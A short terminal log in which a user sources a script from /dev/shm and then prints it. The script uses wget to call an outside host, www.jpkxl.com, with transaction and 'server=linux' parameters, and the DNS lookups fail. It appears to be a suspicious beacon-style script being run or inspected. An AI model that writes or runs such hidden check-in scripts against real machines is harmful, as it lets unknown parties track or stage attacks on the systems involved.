[bernardchan@bernardchan tmp]$ LANG=C . /dev/shm/x.sh
--12:34:13-- http://www.jpkxl.com/?txid=1&type=service&server=linux
=> `index.html?txid=1&type=service&server=linux'
Resolving www.jpkxl.com... failed: Name or service not known.
--12:34:13-- http://www.jpkxl.com/?txid=2&type=service&server=linux
=> `index.html?txid=2&type=service&server=linux'
Resolving www.jpkxl.com... failed: Name or service not known.
[bernardchan@bernardchan tmp]$ cat /dev/shm/x.sh
function call_wget {
wget "http://www.jpkxl.com/?txid=$1&type=service&server=linux"
}
call_wget 1;
call_wget 2;